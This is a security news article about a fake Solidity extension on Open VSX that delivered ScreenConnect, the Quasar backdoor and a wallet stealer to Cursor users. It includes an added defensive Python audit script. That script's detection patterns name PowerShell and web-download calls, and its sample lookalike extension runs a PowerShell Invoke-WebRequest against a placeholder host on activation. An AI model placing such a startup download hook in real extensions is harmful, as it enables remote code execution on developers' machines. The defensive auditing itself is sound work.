A sophisticated cyberattack targeted the Cursor IDE—a Visual Studio Code (VSCode) fork popular among developers for its AI-assisted coding features. Attackers published a fake extension called “Solidity Language” in the Open VSX extension marketplace, masquerading as a tool for Ethereum smart contract development. This extension was, in reality, a vehicle for malware distribution and remote access.
Attack Details
The “Solidity Language” extension claimed to offer syntax highlighting for Solidity, but contained no legitimate functionality. Instead, it executed a malicious JavaScript file (extension.js) upon installation. The attackers inflated the extension’s download count to over 54,000, making it appear more popular and trustworthy than the legitimate version. This manipulation helped it rank higher in search results, deceiving even experienced developers.
Once installed, the extension downloaded and executed PowerShell scripts from a remote server. It then installed the legitimate remote management tool ScreenConnect, granting persistent remote access to the victim’s system. Finally, it deployed additional malware, including the Quasar backdoor and a stealer module capable of extracting credentials, wallet passphrases, and sensitive data from browsers, email clients, and crypto wallets.
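The attack chain above (an extension that claims only to highlight syntax, yet ships a script that runs at activation, spawns PowerShell and fetches remote content) can be audited for on a developer machine. The following script is an added example, not code from the article or from any of the tools it names: it walks an extensions directory (the path ~/.cursor/extensions is an assumption), reads each package.json, and flags extensions whose manifest or entry script shows those traits. The indicator list, the risk thresholds and the two sample extensions it builds in a temporary directory are constructed for illustration; a real highlighter is purely declarative (grammars and languages) and needs no entry script at all.

```python
"""
Heuristic audit of installed VS Code / Cursor extensions (added example; the
indicator patterns, thresholds and sample extensions below are assumptions).
"""
import json
import re
import tempfile
from pathlib import Path

# Heuristic source indicators (assumed; tune to your environment).
RISK_PATTERNS = {
    "spawns_processes": re.compile(r"child_process|\bexecSync?\(|\bspawn\("),
    "invokes_powershell": re.compile(r"powershell", re.IGNORECASE),
    "fetches_remote_content": re.compile(r"https?://|Invoke-WebRequest|DownloadString", re.IGNORECASE),
    "evaluates_dynamic_code": re.compile(r"\beval\(|new Function\("),
}


def audit_extension(ext_dir: Path) -> dict:
    """Return findings for one unpacked extension directory containing package.json."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    findings = []
    activation = manifest.get("activationEvents", [])
    main = manifest.get("main")
    contributes = manifest.get("contributes", {})

    # "*" / onStartupFinished means the entry script runs as soon as the IDE opens.
    if "*" in activation or "onStartupFinished" in activation:
        findings.append("activates_on_startup")
    # A syntax highlighter only needs grammars/languages; an entry script with
    # no declared contribution points is a mismatch between claim and behaviour.
    if main and not contributes:
        findings.append("runs_code_without_contributions")
    if main:
        src_path = ext_dir / main
        if src_path.is_file():
            src = src_path.read_text(encoding="utf-8", errors="replace")
            findings.extend(name for name, pat in RISK_PATTERNS.items() if pat.search(src))

    risk = "high" if len(findings) >= 3 else "medium" if findings else "low"
    return {"name": manifest.get("name", ext_dir.name), "findings": findings, "risk": risk}


def audit_all(extensions_root: Path) -> list:
    """Audit every extension under a root such as ~/.cursor/extensions (path assumed)."""
    return sorted(
        (audit_extension(d) for d in extensions_root.iterdir() if (d / "package.json").is_file()),
        key=lambda r: r["name"],
    )


def build_sample_extensions(root: Path) -> Path:
    """Write two constructed extensions so the audit can run offline."""
    benign = root / "example.solidity-highlighter-1.0.0"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps({
        "name": "solidity-highlighter",
        "contributes": {
            "languages": [{"id": "solidity", "extensions": [".sol"]}],
            "grammars": [{"language": "solidity", "scopeName": "source.solidity",
                          "path": "./solidity.tmLanguage.json"}],
        },
    }), encoding="utf-8")

    lookalike = root / "example.solidity-language-lookalike-1.0.0"
    lookalike.mkdir()
    (lookalike / "package.json").write_text(json.dumps({
        "name": "solidity-language-lookalike",
        "activationEvents": ["*"],
        "main": "./extension.js",
    }), encoding="utf-8")
    # Constructed indicator strings only; example.invalid never resolves.
    (lookalike / "extension.js").write_text(
        'const cp = require("child_process");\n'
        "function activate() {\n"
        '  cp.exec("powershell -Command Invoke-WebRequest https://example.invalid/stage1");\n'
        "}\n"
        "module.exports = { activate };\n",
        encoding="utf-8",
    )
    return root


def demo() -> list:
    """Build the sample extensions in a temp directory and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_all(build_sample_extensions(Path(tmp)))


if __name__ == "__main__":
    for r in demo():
        print(f"{r['risk']:6} {r['name']}: {', '.join(r['findings']) or 'no findings'}")
```

Run it as-is to see the constructed lookalike rated high and the declarative highlighter rated low; pointing audit_all at a real extensions directory turns it into a quick pre-review of what is already installed. The heuristics are deliberately coarse (many legitimate extensions spawn processes or fetch updates), so treat a high rating as a prompt to read the entry script, not as a verdict.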
The Impact
The primary reported victim was a Russian blockchain developer, who lost approximately $500,000 in cryptocurrency after the attackers gained access to his wallet seed phrases and drained his accounts.